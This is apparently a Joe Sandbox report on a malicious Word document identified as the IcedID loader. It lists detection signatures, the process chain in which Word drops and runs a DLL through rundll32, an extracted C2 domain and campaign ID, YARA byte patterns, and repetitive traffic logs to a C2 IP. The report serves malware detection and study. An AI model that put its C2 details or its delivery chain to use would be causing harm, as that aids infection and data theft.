Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
courtesyautomotivedoc08.11.doc

Overview

General Information

Sample Name:courtesyautomotivedoc08.11.doc
Analysis ID:682567
MD5:00e8f42e0462d4abf8a6bb6960abe5b5
SHA1:0235d1eb73c161a7fcc944d99730d8ed0200fb8e
SHA256:3af042bd0b5a186b98920cf0b7066344609d6d6deb163ffb0b60325dcca66e44
Tags:docIcedID
Infos:

Detection

IcedID
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for dropped file
Yara detected IcedID
Submitted sample is a known malware sample
Office process drops PE file
Machine Learning detection for sample
Document contains an embedded VBA macro with suspicious strings
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Document exploit detected (process start blacklist hit)
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Yara signature match
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2032 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • r9093.tmp.exe (PID: 1488 cmdline: "C:\Users\user\AppData\Local\Temp\r9093.tmp.exe" "C:\Users\user\AppData\Local\Temp\y875E.tmp.dll",#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
      • rundll32.exe (PID: 2480 cmdline: "C:\Users\user\AppData\Local\Temp\r9093.tmp.exe" "C:\Users\user\AppData\Local\Temp\y875E.tmp.dll",#1 MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

Threatname: IcedID

{"Campaign ID": 3570055661, "C2 url": "alexbionka.com"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_IcedID_0b62e783unknownunknown
  • 0x876:$a: 89 44 95 E0 83 E0 07 8A C8 42 8B 44 85 E0 D3 C8 FF C0 42 89 44
00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_IcedID_91562d18unknownunknown
  • 0x1bc4:$a: 44 8B 4C 19 2C 4C 03 D6 74 1C 4D 85 C0 74 17 4D 85 C9 74 12 41
00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_IcedID_48029e37unknownunknown
  • 0x1190:$a: 48 C1 E3 10 0F 31 48 C1 E2 20 48 0B C2 0F B7 C8 48 0B D9 8B CB 83 E1
00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmpWindows_Trojan_IcedID_11d24d35unknownunknown
  • 0x3d0:$a2: loader_dll_64.dll
00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_IcedID_6Yara detected IcedIDJoe Security
    Click to see the 7 entries

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    5.2.rundll32.exe.2fab68.0.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
    • 0x1bd0:$internal_name: loader_dll_64.dll
    • 0x1f08:$string6: WINHTTP.dll
    • 0x1bf4:$string7: DllRegisterServer
    • 0x1c06:$string8: PluginInit
    5.2.rundll32.exe.2fab68.0.unpackWindows_Trojan_IcedID_11d24d35unknownunknown
    • 0x1bd0:$a2: loader_dll_64.dll
    5.2.rundll32.exe.2fab68.0.unpackWindows_Trojan_IcedID_91562d18unknownunknown
    • 0x13c4:$a: 44 8B 4C 19 2C 4C 03 D6 74 1C 4D 85 C0 74 17 4D 85 C9 74 12 41
    5.2.rundll32.exe.2fab68.0.unpackWindows_Trojan_IcedID_48029e37unknownunknown
    • 0x990:$a: 48 C1 E3 10 0F 31 48 C1 E2 20 48 0B C2 0F B7 C8 48 0B D9 8B CB 83 E1
    5.2.rundll32.exe.180000000.1.unpackMAL_IcedID_GZIP_LDR_2021042021 initial Bokbot / Icedid loader for fake GZIP payloadsThomas Barabosch, Telekom Security
    • 0x27d0:$internal_name: loader_dll_64.dll
    • 0x3198:$string0: _gat=
    • 0x3048:$string1: _ga=
    • 0x30a0:$string2: _gid=
    • 0x3118:$string3: _u=
    • 0x303a:$string4: _io=
    • 0x3054:$string5: GetAdaptersInfo
    • 0x2b08:$string6: WINHTTP.dll
    • 0x27f4:$string7: DllRegisterServer
    • 0x2806:$string8: PluginInit
    • 0x3134:$string9: POST
    Click to see the 14 entries

    Sigma Signatures

    No Sigma rule has matched

    Snort Signatures

    No Snort rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Multi AV Scanner detection for submitted file
    Source: courtesyautomotivedoc08.11.docVirustotal: Detection: 26%Perma Link
    Source: courtesyautomotivedoc08.11.docReversingLabs: Detection: 17%
    Antivirus detection for dropped file
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n14[1].dllAvira: detection malicious, Label: HEUR/AGEN.1251556
    Source: C:\Users\user\AppData\Local\Temp\y875E.tmp.dllAvira: detection malicious, Label: HEUR/AGEN.1251556
    Yara detected IcedID
    Source: Yara matchFile source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2480, type: MEMORYSTR
    Source: Yara matchFile source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE
    Machine Learning detection for sample
    Source: courtesyautomotivedoc08.11.docJoe Sandbox ML: detected
    Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: IcedID {"Campaign ID": 3570055661, "C2 url": "alexbionka.com"}
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF7532CDA CryptCreateHash,5_2_000007FEF7532CDA
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF7532CCA CryptCreateHash,5_2_000007FEF7532CCA
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF7532CF7 CryptCreateHash,CryptAcquireContextW,5_2_000007FEF7532CF7
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000007FEF7532CCA CryptCreateHash,5_2_000007FEF7532CCA
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: Binary string: rundll32.pdb source: r9093.tmp.exe, r9093.tmp.exe, 00000004.00000000.924895395.0000000000761000.00000020.00000001.01000000.00000003.sdmp, r9093.tmp.exe, 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, r9093.tmp.exe.1.dr

    Software Vulnerabilities

    barindex
    Document exploit detected (drops PE files)
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: loader_p3_dll_64_n3_crypt_x64_asm_clone_n14[1].dll.1.drJump to dropped file
    Document exploit detected (creates forbidden files)
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n14[1].dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\y875E.tmp.dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeJump to behavior
    Document exploit detected (process start blacklist hit)
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Users\user\AppData\Local\Temp\r9093.tmp.exe
    Source: global trafficDNS query: name: alexbionka.com
    Source: global trafficDNS query: name: alexbionka.com
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
